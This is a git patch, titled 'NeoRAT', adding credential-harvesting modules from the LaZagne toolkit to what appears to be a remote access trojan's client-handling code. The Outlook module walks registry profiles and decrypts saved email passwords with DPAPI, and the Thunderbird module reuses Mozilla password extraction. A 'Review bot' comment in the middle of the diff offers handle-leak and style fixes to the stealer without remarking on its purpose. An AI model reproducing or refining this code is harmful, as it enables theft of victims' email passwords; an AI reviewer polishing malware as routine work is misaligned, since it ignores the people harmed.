From 20dbeb2f38684c65ff0a4b99012c161295708e88 Mon Sep 17 00:00:00 2001
From: AL-LCL
Date: Fri, 19 May 2023 11:01:49 +0200
Subject: NeoRAT
---
 .../lazagne/softwares/mails/__init__.py | 0
 .../lazagne/softwares/mails/outlook.py | 66 ++++++++++++++++++++++
 .../lazagne/softwares/mails/thunderbird.py | 9 +++
 3 files changed, 75 insertions(+)
 create mode 100644 foreign/client_handling/lazagne/softwares/mails/__init__.py
 create mode 100644 foreign/client_handling/lazagne/softwares/mails/outlook.py
 create mode 100644 foreign/client_handling/lazagne/softwares/mails/thunderbird.py
(limited to 'foreign/client_handling/lazagne/softwares/mails')
diff --git a/foreign/client_handling/lazagne/softwares/mails/__init__.py b/foreign/client_handling/lazagne/softwares/mails/__init__.py
new file mode 100644
index 0000000..e69de29
diff --git a/foreign/client_handling/lazagne/softwares/mails/outlook.py b/foreign/client_handling/lazagne/softwares/mails/outlook.py
new file mode 100644
index 0000000..21cf6b8
--- /dev/null
+++ b/foreign/client_handling/lazagne/softwares/mails/outlook.py
@@ -0,0 +1,66 @@
+# -*- coding: utf-8 -*-
+try:
+ import _winreg as winreg
+except ImportError:
+ import winreg
+
+import foreign.client_handling.lazagne.config.winstructure as win
+from foreign.client_handling.lazagne.config.module_info import ModuleInfo
+from foreign.client_handling.lazagne.config.constant import constant
+
+
+class Outlook(ModuleInfo):
+ def __init__(self):
+ ModuleInfo.__init__(self, 'outlook', 'mails', registry_used=True, winapi_used=True)
+
+ def run(self):
+ key_path = 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook'
+ try:
+ hkey = win.OpenKey(win.HKEY_CURRENT_USER, key_path)
+ except Exception as e:
+ self.debug(e)
+ return
+
+ num = winreg.QueryInfoKey(hkey)[0]
+ pwd_found = []
+ for x in range(0, num):
+ name = winreg.EnumKey(hkey, x)
+ skey = win.OpenKey(hkey, name, 0, win.ACCESS_READ)
+
+ num_skey = winreg.QueryInfoKey(skey)[0]
+ if num_skey != 0:
+ for y in range(0, num_skey):
+ name_skey = winreg.EnumKey(skey, y)
+ sskey = win.OpenKey(skey, name_skey)
+ num_sskey = winreg.QueryInfoKey(sskey)[1]
+
+ for z in range(0, num_sskey):
+ k = winreg.EnumValue(sskey, z)
+ if 'password' in k[0].lower():
+ values = self.retrieve_info(sskey, name_skey)
+
+ if values:
+ pwd_found.append(values)
+
+ winreg.CloseKey(skey)
+ winreg.CloseKey(hkey)
+ return pwd_found
+
+ def retrieve_info(self, hkey, name_key):
+ values = {}
+ num = winreg.QueryInfoKey(hkey)[1]
+ for x in range(0, num):
+ k = winreg.EnumValue(hkey, x)
+ if 'password' in k[0].lower():
+ try:
+ password = win.Win32CryptUnprotectData(k[1][1:], is_current_user=constant.is_current_user, user_dpapi=constant.user_dpapi)
+ values[k[0]] = password.decode('utf16')
+ except Exception as e:
+ self.debug(str(e))
+ values[k[0]] = 'N/A'
+ else:
+ try:
+ values[k[0]] = str(k[1]).decode('utf16')
+ except Exception:
+ values[k[0]] = str(k[1])
+ return values
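Review bot: In run(), the handle `sskey` returned by `win.OpenKey(skey, name_skey)` inside the `for y` loop is never released, whereas `skey` and `hkey` both get `winreg.CloseKey`; one registry handle is leaked per sub-key visited. Add `winreg.CloseKey(sskey)` as the last statement of the `for y` body, after the `for z` loop, so all three handles are released symmetrically (if `win.OpenKey` hands back a context-managed object, a `with` block would be cleaner, but that helper is not visible in this hunk). As a point of style, `retrieve_info` takes a `name_key` argument it never reads, and both loops index the `winreg.EnumValue` tuple as `k[0]`/`k[1]`; a tuple unpack such as `value_name, value_data, _ = winreg.EnumValue(hkey, x)` would read more clearly than the positional indexing. The class also carries no docstring stating what subtree it enumerates or what its return value holds.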
diff --git a/foreign/client_handling/lazagne/softwares/mails/thunderbird.py b/foreign/client_handling/lazagne/softwares/mails/thunderbird.py
new file mode 100644
index 0000000..a76ae9e
--- /dev/null
+++ b/foreign/client_handling/lazagne/softwares/mails/thunderbird.py
@@ -0,0 +1,9 @@
+from foreign.client_handling.lazagne.config.module_info import ModuleInfo
+from foreign.client_handling.lazagne.softwares.browsers.mozilla import Mozilla
+
+
+class Thunderbird(Mozilla):
+
+ def __init__(self):
+ self.path = u'{APPDATA}\\Thunderbird'
+ ModuleInfo.__init__(self, 'Thunderbird', 'mails')
-- 
cgit v1.2.3